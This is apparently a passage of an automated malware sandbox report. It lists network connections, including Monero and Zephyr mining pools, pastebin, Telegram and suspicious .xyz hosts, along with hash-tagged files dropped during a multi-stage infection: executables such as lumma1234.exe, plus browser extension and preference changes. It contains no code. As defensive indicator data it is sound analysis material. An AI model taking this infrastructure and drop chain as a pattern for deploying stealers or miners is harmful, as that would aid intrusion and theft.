| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FI | 65.108.55.55:9000 | tcp | |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| FI | 65.108.55.55:9000 | tcp | |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | zeph-eu2.nanopool.org | udp |
| GB | 51.195.138.197:10943 | zeph-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 51.15.193.130:14433 | xmr-eu1.nanopool.org | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 54.210.117.250:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.16.225:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | api3.check-data.xyz | udp |
| US | 44.237.26.169:80 | api3.check-data.xyz | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | orion.ts.360.com | udp |
| NL | 82.145.215.156:443 | orion.ts.360.com | tcp |
| US | 8.8.8.8:53 | ocsp.crlocsp.cn | udp |
| US | 101.198.193.5:80 | ocsp.crlocsp.cn | tcp |
Files
memory/2204-0-0x0000000000CE0000-0x0000000001173000-memory.dmp
memory/2204-1-0x0000000077260000-0x0000000077262000-memory.dmp
memory/2204-2-0x0000000000CE1000-0x0000000000D0F000-memory.dmp
memory/2204-3-0x0000000000CE0000-0x0000000001173000-memory.dmp
memory/2204-5-0x0000000000CE0000-0x0000000001173000-memory.dmp
memory/2204-9-0x0000000000CE0000-0x0000000001173000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
| MD5 | 3eaecc080bd77a152119127af73707b3 |
| SHA1 | 71222b5b8c9984814390709d267be019a95ab4b6 |
| SHA256 | fbe40f767788ac5d1b503e9b639711db6152a0b5e623d131b05381f02de957b1 |
| SHA512 | a9d9dcd5f743812adf0b9b880ea334a6301d5d6b33f97e48dc9f3c397640b189bb1d34137ad7c23f45faaed398c44e9e55fd85368a6061980973efc73aae19ec |
memory/2584-17-0x00000000001E0000-0x0000000000673000-memory.dmp
memory/2204-16-0x0000000000CE0000-0x0000000001173000-memory.dmp
memory/2584-18-0x00000000001E1000-0x000000000020F000-memory.dmp
memory/2584-19-0x00000000001E0000-0x0000000000673000-memory.dmp
memory/2584-21-0x00000000001E0000-0x0000000000673000-memory.dmp
memory/2584-22-0x00000000001E0000-0x0000000000673000-memory.dmp
memory/2584-23-0x00000000001E0000-0x0000000000673000-memory.dmp
memory/2584-24-0x00000000001E0000-0x0000000000673000-memory.dmp
memory/2584-25-0x00000000001E0000-0x0000000000673000-memory.dmp
memory/2584-26-0x00000000001E0000-0x0000000000673000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
| MD5 | 208bd37e8ead92ed1b933239fb3c7079 |
| SHA1 | 941191eed14fce000cfedbae9acfcb8761eb3492 |
| SHA256 | e1fd277ffc74d67554adce94366e6fa5ebc81f8c4999634bcc3396164ba38494 |
| SHA512 | a9c3c32573a16b7ca71a12af6e8c8e88502b66bae2465a82dd921fbc6e0c833b9b1c2d436963df189dd9d68568e1be9128826a2e59f1d5fe066b637d2d866715 |
memory/868-43-0x0000000000020000-0x0000000000021000-memory.dmp
memory/868-46-0x0000000000020000-0x0000000000021000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
| MD5 | 84bf36993bdd61d216e83fe391fcc7fd |
| SHA1 | e023212e847a54328aaea05fbe41eb4828855ce6 |
| SHA256 | 8e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa |
| SHA512 | bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf |
memory/2784-62-0x00000000002C0000-0x0000000000312000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tmp7E93.tmp
| MD5 | 1420d30f964eac2c85b2ccfe968eebce |
| SHA1 | bdf9a6876578a3e38079c4f8cf5d6c79687ad750 |
| SHA256 | f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9 |
| SHA512 | 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8 |
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
| MD5 | c4ffab152141150528716daa608d5b92 |
| SHA1 | a48d3aecc0e986b6c4369b9d4cfffb08b53aed89 |
| SHA256 | c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475 |
| SHA512 | a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9 |
memory/2584-95-0x00000000001E0000-0x0000000000673000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
| MD5 | 0b7e08a8268a6d413a322ff62d389bf9 |
| SHA1 | e04b849cc01779fe256744ad31562aca833a82c1 |
| SHA256 | d23a10b3ff0c565ea8ee7f54bcded0582e1e621ebad69d4523d6746f6d8e0e65 |
| SHA512 | 3d226673e30bbbc27e0a5a6c64bf81eca475c697486b20141df7975bef97901d4865b88f41937f5e3dd00b437f24f91493f80cb69aa366b7a49cd17b26197ba4 |
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
| MD5 | 05b11e7b711b4aaa512029ffcb529b5a |
| SHA1 | a8074cf8a13f21617632951e008cdfdace73bb83 |
| SHA256 | 2aab2ca39749b21877d1c52526009f9f5d251d934205e9f671a9e84cecd55afa |
| SHA512 | dde7b561ffb3b9fe71827be9313cd3b83900c3ce76b053d028e84223fba1b06035437b3860a74de7dc2f5d40f0b90bd7d60139701d752c803eb08f362a5d57ff |
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
| MD5 | a991da123f34074f2ee8ea0d798990f9 |
| SHA1 | 3988195503348626e8f9185747a216c8e7839130 |
| SHA256 | fd42e618223f510d694c5fb2f8ecbc1a88cabf003bcf20da6227da30a1352a0f |
| SHA512 | 1f958cacb820833ea8b5ac2d9ca7f596625e688f8f6b6e3ab6f27aa3b25b8c9e5b57e1eed532a8d2519da6c1b41492eb8ac930fc25eaf2be2f344c2f32e81a49 |
memory/1316-155-0x0000000001010000-0x000000000104C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000030001\CoMachina.exe
| MD5 | 1b7c22a214949975556626d7217e9a39 |
| SHA1 | d01c97e2944166ed23e47e4a62ff471ab8fa031f |
| SHA256 | 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87 |
| SHA512 | ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5 |
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
| MD5 | 0099a99f5ffb3c3ae78af0084136fab3 |
| SHA1 | 0205a065728a9ec1133e8a372b1e3864df776e8c |
| SHA256 | 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226 |
| SHA512 | 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6 |
memory/2584-177-0x00000000001E0000-0x0000000000673000-memory.dmp
memory/1316-178-0x00000000004B0000-0x00000000004B6000-memory.dmp
memory/1316-179-0x00000000004C0000-0x000000000051C000-memory.dmp
memory/2480-185-0x0000000002070000-0x0000000002078000-memory.dmp
memory/2480-184-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
memory/1824-186-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1824-197-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1824-196-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1824-195-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1824-194-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1824-192-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1824-190-0x0000000000400000-0x0000000000408000-memory.dmp
memory/1824-188-0x0000000000400000-0x0000000000408000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarBD0F.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
\Users\Admin\Pictures\K1cMIEpl35iIMRssKBcYXhPh.exe
| MD5 | cd4acedefa9ab5c7dccac667f91cef13 |
| SHA1 | bff5ce910f75aeae37583a63828a00ae5f02c4e7 |
| SHA256 | dd0e8944471f44180dd44807d817e0b8a1c931fc67d48278cdb7354d98567e7c |
| SHA512 | 06fae66da503eb1b9b4fbe63a5bb98c519a43999060029c35fe289e60b1cb126a6278c67ce90f02e05b893fcaea6d54f9deb65bc6da82561487a7754f50c93d1 |
\Users\Admin\AppData\Local\Temp\{9E8EF966-EE3D-4b3d-8CD4-7ADEEDA31A5B}.tmp\360P2SP.dll
| MD5 | fc1796add9491ee757e74e65cedd6ae7 |
| SHA1 | 603e87ab8cb45f62ecc7a9ef52d5dedd261ea812 |
| SHA256 | bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60 |
| SHA512 | 8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d |
C:\Users\Admin\AppData\Local\Temp\[email protected]
| MD5 | 184a117024f3789681894c67b36ce990 |
| SHA1 | c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e |
| SHA256 | b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e |
| SHA512 | 354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7 |
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
| MD5 | e6edb41c03bce3f822020878bde4e246 |
| SHA1 | 03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9 |
| SHA256 | 9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454 |
| SHA512 | 2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1 |
memory/2584-304-0x00000000001E0000-0x0000000000673000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a621af8b687ed0d594a4ea144bd0a1b1 |
| SHA1 | 35f3c9ce80841897d1a1dbffc9b69038bc501bd1 |
| SHA256 | 9251f5b9741ce92157a99ec9550a36df6e4c04df7763981c112df1070dc764e5 |
| SHA512 | 86e33b521d813d2017da58659e84232d37fdfb5bb8178d71489b9012554e28b3d97eaece2f72170cac7de614a7e20db5da29f3cb10383d4cff336a83af5a6fae |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 60e789bfe83dad0587bc7053385a22a6 |
| SHA1 | 720c986acef74269448d106f17ae1c293a811260 |
| SHA256 | 7df978854db6da4556cefed4c7d92d449c7eb3df4e09ff44341a6fe13a096b0c |
| SHA512 | 7c6cb7780d3977deb29701c6fd9b54e43459faefac61cd10a6fa4d3ab00b965b4d6269791992355f9273341f6eef040fbed7078290e967c4e0b8805c2c9f319c |
\Users\Admin\Pictures\eqP4jOc2woE7Tde5oTl3vAbj.exe
| MD5 | acadbe83c09a7a9b8213a662eda12e93 |
| SHA1 | 26a6e55076bc0602ff9060ac529528f3fc631986 |
| SHA256 | 42dd6aeee394e298646701ebe1fd611186ea4ee8c7e6383913db121444635944 |
| SHA512 | a7ad3777e4a5ae9dd8dd09cff3a3ab498c6d2dc5b922407c48936225cb0c91430f75114f46b0a7b39046dc45c26221e199d33ff0bce105e05e903eef7fbdcd9f |
memory/776-413-0x000000013F3B0000-0x0000000140002000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c4ef9593d7c2aa2c0335b55eed497bfe |
| SHA1 | 2433680233d1aec3c79088f868752fc8da47127e |
| SHA256 | 4fb674718dfac985aa5f992436b47af4e2b8811fa04d5b44d3fd281dd0a8dfad |
| SHA512 | 7b740f8d1a6bc2b8d5d24639785f1e61364f4823f32c33c85b05f7af0d28a964ec494b912c3a56e38199568a2ab2098a77f087ab12846d474ede76f045188a6d |
\Users\Admin\AppData\Local\Temp\eng.exe
| MD5 | fb88fe2ec46424fce9747de57525a486 |
| SHA1 | 19783a58cf0fccb5cc519ebf364c4f4c670d81ce |
| SHA256 | cbd9e9333684de488c6fd947583149065d9d95b031d6be7a0440c2581a304971 |
| SHA512 | 885d0ec96eb73c3213c9fe055620c70561ca1aecc5f9cb42cc8e1c26b86c383e92f506e8da4696c7ff7c4feafe09791ab900b2a983528b680224af347ef4b40c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Descriptions
| MD5 | ac7ade76b8beaf6a938d53b3caaba512 |
| SHA1 | 23cd8c38ed38d7619cde18b13b9a5aa39daec08e |
| SHA256 | 7ae2ec9669a960155327bd0a4bc77910a1b99583b52992d7cd8199e4f6ca2f69 |
| SHA512 | ff4af167f39599d7fcb3bfc94cd3dce9f0ae025298e43d2fd4a6847881d6317463df3f5610d1ae1dc9fdd6de44f9ce156f5b3543c6df4fe2e6b39a524330e705 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Tank
| MD5 | 98d329abe01cf448863e8bc0bd01fddc |
| SHA1 | 72e41bbce5c1a58c7093fdceb16a4d4ceceedc14 |
| SHA256 | e37dd741efc2fe87d76ff42c501ab30ce887d19de47834e30d8e96bbb33637f5 |
| SHA512 | b4b9b3c37ba8dcbf331686e3b8fc8533a2c33e449729cb6b00d21575b9975f59bf3c1357bd3d405ebc40e9a180c21e52a5ed172db01365e639ba6d095905c2ba |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Defeat
| MD5 | 5fa2ab455cc5da6e96ab13dd1cd54bb6 |
| SHA1 | 81d893c35c38ae7516582fcc51bce0b1e53f941d |
| SHA256 | 48c0322e96b304cd939baf6d79183e69069678b89184d7a8c43804769095fad2 |
| SHA512 | 06e3ce00536694b0ee72809480f820e90decbc3b3337ef148fa18caeb502f799485c4c1cd1342cc8debff83e0d76f0e8d13b93a75419631da78aa8c59a4d9f6d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Proc
| MD5 | 3401516a7640eb223c1b2f7e618c451d |
| SHA1 | f865b234e6c653130afb438bc7c5260cde3abf92 |
| SHA256 | 9c279dfab8f0a455caa5e1272a37d523d54af33a1b8b8c661121c175e8815692 |
| SHA512 | 94ecb28fde13608a2a0436c7335347d8c8627fcbdbc8c3cf480d7175c086b544ba068ed566fb9174ed78a318ae6ff4337a863c5a220158e5320d1e237ea1786b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Stayed
| MD5 | 326771f3c4cabaab267bba316782af10 |
| SHA1 | 3402750abcc2f61054bf751bc7f5228ed3cb49f6 |
| SHA256 | ce774c5b786f3bcad31d8e9ac06a43747f59d5d9ddcd96db488beb16af3a10dd |
| SHA512 | df7d2c48f39833db0da5e4c5bcf2ad3be4ec0e9f60a2b8c6a888a7f74eb8a6b3ad604fffedee2bc2288eabb59d073272fb5edd7733348db70e37163c138e086f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Ed
| MD5 | f47d19edcc3babcde919e3c34e823295 |
| SHA1 | 6c7258605316c1fb24f8ab4356c4a7124c21b69e |
| SHA256 | f455c49ee56b4c49cf34ad0cd07986b5f55b504a8b523ea0eb79f332a255a3d6 |
| SHA512 | 9df301ff7113259e13beebf5a7d1b2270c65c568612539bf26416eab2edb3af591a30279793700a881972de4266e1c9e044db3c0de5b6a1d328b700c3004698c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Switched
| MD5 | 052bd98c12eb6881b0ef0e5809d1dac8 |
| SHA1 | 5a678738efb5b39b6d6c2503a3da00ecfd3539ae |
| SHA256 | 12387059317cee313e858a6707c3abc0aad950d383621ec109acffa1a1e3c456 |
| SHA512 | 86394e8351977784a8dc512aca1a0fd874903fd98c7b7418fac13a13ef4d9654141496211d9808bbd033a9340ed00da0c2b612318eff8425f63f561f0fb91321 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Windsor
| MD5 | c734f7c2828866b315e700633b23585a |
| SHA1 | e130edbe1002a0ac5dc36b9dc378b3377c25f539 |
| SHA256 | a64a886e83d6e03b962790b6a1da7c5fa436b7c58ac7e10ae644c367f3363da5 |
| SHA512 | 80481e4810e3107f2a3ff2a54b31cc6c1997a62cc1b6c92dc03c306a7b3a378f232fd57801762f76e5cfbf87e6ca35115b258aa700bbb2439a17877803ff7c24 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Teaching
| MD5 | c5e2683b5a8426fdc75ad224c4c3b432 |
| SHA1 | 24e8fa9fff6afbef893ca612786526de4d3f7866 |
| SHA256 | 42d15faa6a365a2d83698253fedbe72a13cbd5b7cf34234073e743a12d7ee276 |
| SHA512 | 0e5a8bbfad9af2d7646ce1cef789baf1967ffdb70b0303d5507732ea1e1fd98658681d6cbf520bcd129109c032bb12996f5d11d71eb688020d36cb949ddc5642 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Spirit
| MD5 | e3da5f2550d27668b287d2d8781d72fe |
| SHA1 | c492e85131f137f564eebfb92ff0d5208350ba39 |
| SHA256 | 338c5edf0aeef9a14ffcaccfa0463ba901bc4b93e6764175df4f1c148cf87168 |
| SHA512 | ca550c7c69920203aa53096882fb408a4bd1af8438dcedb02f43bd32d125328e09f31677bd77bbdafee9fadb553fa0fd11e6d2c951482033a2e3b08d2b9b39ff |
memory/2108-553-0x000000013FC00000-0x000000014098D000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 58e08a5b31c576aa40cdcaab6b37614c |
| SHA1 | 642d7dee20d1fd2a39f9cf0972e7177d442d0e1c |
| SHA256 | 0cbe84989c6efd094089b10105d3d05a7ed77ed155cff110fe68b575a41641b8 |
| SHA512 | 47cc863b10c9dd2712847cf21071e68a392773890574d3498aa8676cb8e97a444df73a6fe7dce7498192877477d10773bb03c97a5888dfdd9d1d18bc1cc42961 |
C:\Users\Admin\Pictures\gDxphg0oWiHodiMmsEznEhcd.exe
| MD5 | 08063da816c5db77ce64807c4ec2f7e8 |
| SHA1 | 61ded712f36458ba6ffcec37edbf65d5927d2d92 |
| SHA256 | dd08b1356c9b9bffe1ae9c254d28411890204e5b8fe1f9b9af0a7a3e5b6ed61e |
| SHA512 | df74cef767efde4711af6e40ef82801d91c4f1b5805fb0411235272a62fd08204d39153d4ae2056880d9d3ceaaae9c8e87254ea57d35a83bf501ac5be721c5f0 |
memory/2584-640-0x00000000001E0000-0x0000000000673000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe
| MD5 | ffada57f998ed6a72b6ba2f072d2690a |
| SHA1 | 6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f |
| SHA256 | 677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12 |
| SHA512 | 1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f |
memory/1724-656-0x0000000010000000-0x00000000105DF000-memory.dmp
memory/2680-663-0x0000000003350000-0x0000000003596000-memory.dmp
memory/2680-664-0x0000000003350000-0x0000000003596000-memory.dmp
memory/2680-665-0x0000000003350000-0x0000000003596000-memory.dmp
memory/2680-666-0x0000000003350000-0x0000000003596000-memory.dmp
memory/2680-667-0x0000000003350000-0x0000000003596000-memory.dmp
memory/2584-668-0x00000000001E0000-0x0000000000673000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\asVPZnM.exe
| MD5 | 0550ef6afda33ea1c1a231b939ca9b07 |
| SHA1 | f74897166553b218e3a0869502ed036f175be9cd |
| SHA256 | 8462d8b0433559e9afc2cd5de7bffe38fc6b82e3da9e79bdd33a85ab79fafaeb |
| SHA512 | 329fa4ba439852740683dfb60070116fc459785d8a936e59aa4e55affe4697d66c5db844d154b30ab41913342fd5d51760f329cf30dc039387d0929026219a2e |
memory/2804-672-0x0000000010000000-0x00000000105DF000-memory.dmp
memory/2756-681-0x000000001B5B0000-0x000000001B892000-memory.dmp
memory/2756-682-0x0000000002220000-0x0000000002228000-memory.dmp
memory/2584-683-0x00000000001E0000-0x0000000000673000-memory.dmp
memory/2584-684-0x00000000001E0000-0x0000000000673000-memory.dmp
memory/2696-689-0x000000001B4C0000-0x000000001B7A2000-memory.dmp
memory/1308-691-0x0000000000360000-0x0000000000368000-memory.dmp
memory/1728-699-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1728-696-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1728-695-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1728-694-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1728-693-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1728-692-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2432-701-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2432-708-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2432-712-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2432-711-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2432-700-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2432-705-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2432-706-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2432-707-0x00000000001F0000-0x0000000000210000-memory.dmp
memory/2432-704-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2432-710-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2432-709-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2432-703-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2432-702-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2432-715-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1956-716-0x0000000076E50000-0x0000000076F6F000-memory.dmp
memory/2432-714-0x0000000140000000-0x0000000140848000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | 8043608f4f59155d78a15d53c3077452 |
| SHA1 | 5f2c9be6de529620568f2af72692f8dae9948a5c |
| SHA256 | eb31d22328c457f82387b3e874d7afb2b0985a124f140b27343298c2642afd9b |
| SHA512 | f3658ca4caff4384733cc0d192540b7ebac3f3ca8cebcfc9108aea1dc177bef04737461e4ba374c8afe912aace0a63dfa546505faff72f122b2fef42ccc947c7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u7g6zvo6.default-release\prefs.js
| MD5 | ef496e3ee62fc0a055e9e54557f0174e |
| SHA1 | ae0b9e724bb8a8aa424d686948c33ba682431599 |
| SHA256 | 4f1d1d142829c10d6b0083c6eafa3427aa7e7458e80fd53076cec805430b2816 |
| SHA512 | 48892aef684ff23a3c028da2596c60a50dbea69db979c761773982fa54f6672663d7913f8f9641c286b8cc37bb777eaee737cd9030c0c9656e49c4126799720e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 704e46737037028aab66cf61d0df9b1d |
| SHA1 | f96fbf4b04706e1ba6657801ff576962b60dbeaa |
| SHA256 | f8fea5fe018ef78472b185b53a35111d5094990a7810ca55cf738a93ed4df431 |
| SHA512 | 3d9f73f8aa9f0157b5434c93e3dec313bd1a8e561e6f5267c60a52dec39d659ddfd3b0e9ddf6b3a73100ce534a2f91e798b724cd88824eb88a459bbb6c28f8b9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | b068c34812cfbd7597e9442d7aa88d0e |
| SHA1 | f61746ec3e68c4cf6a8a2a93930a8863791a8a03 |
| SHA256 | 7c054573281c355fe739a9bd3cbf9b1148a48870ee2a30756ba9da2ba5f4dcb9 |
| SHA512 | 959223562e12dd8fbc1622beb998910357982bbdf1b6d5c2989bfcab1ad5911491eab78fd8a2edcf26e891b21710a4d0494e33c54bda307d73ed700a1cee2354 |
C:\Users\Admin\AppData\Local\Temp\1717086197_00000000_base\360base.dll
| MD5 | b192f34d99421dc3207f2328ffe62bd0 |
| SHA1 | e4bbbba20d05515678922371ea787b39f064cd2c |
| SHA256 | 58f13d919f44d194827b609b6b267246abc47134bb202472c0dfe033b9d7ed73 |
| SHA512 | 00d4c7a0a0097eb4b31a71a0eaf6ff0d44619f77a335c75688565e34e6d7f4fb6c258917457d560c6b0a5077603845ce012e01d9862e87fb5327d7f8da970f95 |
